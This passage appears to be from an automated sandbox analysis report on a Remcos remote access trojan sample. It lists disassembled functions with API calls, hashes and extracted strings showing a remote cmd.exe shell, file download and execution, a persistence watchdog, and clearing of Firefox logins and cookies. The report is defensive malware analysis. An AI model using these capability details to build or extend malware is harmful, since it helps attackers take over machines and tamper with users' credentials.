                                                  • GetLastError.KERNEL32 ref: 0040BEF1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: Rmc-I7G983
                                                  • API String ID: 1925916568-3173645232
                                                  • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                  • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                  Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 761 412513-41253f RegOpenKeyExA 762 412541-412567 RegQueryValueExA RegCloseKey 761->762 763 412572 761->763 762->763 764 412569-412570 762->764 765 412577-412583 call 401f66 763->765 764->765
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                  • Opcode Fuzzy Hash: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                  Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 768 4124b7-4124df RegOpenKeyExA 769 4124e1-412509 RegQueryValueExA RegCloseKey 768->769 770 41250f-412512 768->770 769->770 771 41250b-41250e 769->771
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                  Function 005307A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 800 5307a6-5307bf 801 5307c1-5307c3 800->801 802 5307c5 801->802 803 5307ca-5307d6 CreateToolhelp32Snapshot 801->803 802->803 804 5307e6-5307f3 Module32First 803->804 805 5307d8-5307de 803->805 806 5307f5-5307f6 call 530465 804->806 807 5307fc-530804 804->807 805->804 811 5307e0-5307e4 805->811 812 5307fb 806->812 811->801 811->804 812->807
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005307CE
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005307EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 2a049595326097830ffd434e032aa1e7b89471afc7debe5dcddc0a229b912db2
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 0DF06D322017156BE7203AB9A89DA6F7BE8FF89765F101528E642920C0DAB0F8458A61
                                                  Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 813 43360d-433610 814 43361f-433622 call 43a88c 813->814 816 433627-43362a 814->816 817 433612-43361d call 442200 816->817 818 43362c-43362d 816->818 817->814 821 43362e-433632 817->821 822 433638-433dec call 433d58 call 437bd7 821->822 823 433ded-433e09 call 433d8b call 437bd7 821->823 822->823
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                    • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3476068407-0
                                                  • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                  • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                  • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                  • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                  Function 020F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 833 20f0e0f-20f0e24 SetErrorMode * 2 834 20f0e2b-20f0e2c 833->834 835 20f0e26 833->835 835->834
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: 373609c7fd307ef06685ff80add0f5f843e46d53b934b4a801672e3e55fe8bac
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: C6D01231545228B7D7412A94DC09BCD7B5CDF05B66F008011FB0DD9481C770954046E5
                                                  Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                  • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                  • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                  • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                  Function 00530465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 005304B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 65363229aa5d9e0f7056bc36345532fa00e747c09c57f64967f3a62b089b4861
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 10112B79A40208EFDB01DF98C985E98BFF5AF08750F058094FA489B362D371EA50DF90

                                                  Non-executed Functions

                                                  Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                    • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                    • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                    • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                    • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                    • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                    • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                  • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                    • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                    • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                    • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                  • Sleep.KERNEL32(000007D0), ref: 00407976
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                    • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                  • API String ID: 2918587301-599666313
                                                  • Opcode ID: abbbf9720a01dc55ebef3b52bea707bace41c667e9f8aeb14689948fdfb88dc7
                                                  • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                  • Opcode Fuzzy Hash: abbbf9720a01dc55ebef3b52bea707bace41c667e9f8aeb14689948fdfb88dc7
                                                  • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                  Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040508E
                                                    • Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • __Init_thread_footer.LIBCMT ref: 004050CB
                                                  • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                  • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                    • Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                    • Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                  • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                  • CloseHandle.KERNEL32 ref: 004053CD
                                                  • CloseHandle.KERNEL32 ref: 004053D5
                                                  • CloseHandle.KERNEL32 ref: 004053E7
                                                  • CloseHandle.KERNEL32 ref: 004053EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                  • API String ID: 3815868655-81343324
                                                  • Opcode ID: a852e97d51634d027372abbadf4744862e9a15ee51a7d59a2ccf7494b6424d00
                                                  • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                  • Opcode Fuzzy Hash: a852e97d51634d027372abbadf4744862e9a15ee51a7d59a2ccf7494b6424d00
                                                  • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                  Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                  • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                  • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                  • API String ID: 65172268-860466531
                                                  • Opcode ID: 4e8f88480e695f0b008eedc59160f23e6e311b24a71d4df8cbec1ea9793d479a
                                                  • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                  • Opcode Fuzzy Hash: 4e8f88480e695f0b008eedc59160f23e6e311b24a71d4df8cbec1ea9793d479a
                                                  • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                  Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                  • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                  • FindClose.KERNEL32(00000000), ref: 0040B517
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: b584019745e8484aa2f1f86582a070c659bd219e03dd8eaa35b0525f002778b6
                                                  • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                  • Opcode Fuzzy Hash: b584019745e8484aa2f1f86582a070c659bd219e03dd8eaa35b0525f002778b6
                                                  • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                  Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windownativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDefWindowProc_A.USER32(?,00000401,?,?), ref: 0041CAE9
                                                  • GetCursorPos.USER32(?), ref: 0041CAF8
                                                  • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                  • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                  • ExitProcess.KERNEL32 ref: 0041CB74
                                                  • CreatePopupMenu.USER32 ref: 0041CB7A
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1665278180-3535843008
                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                  • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                  Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                  • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                  • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                  • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: d079bd86303ea68401695b21b34f6fe3fafa40d975d36afa8547e805b24be126
                                                  • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                  • Opcode Fuzzy Hash: d079bd86303ea68401695b21b34f6fe3fafa40d975d36afa8547e805b24be126
                                                  • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                  Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                  Strings
                                                  Memory Dump Source
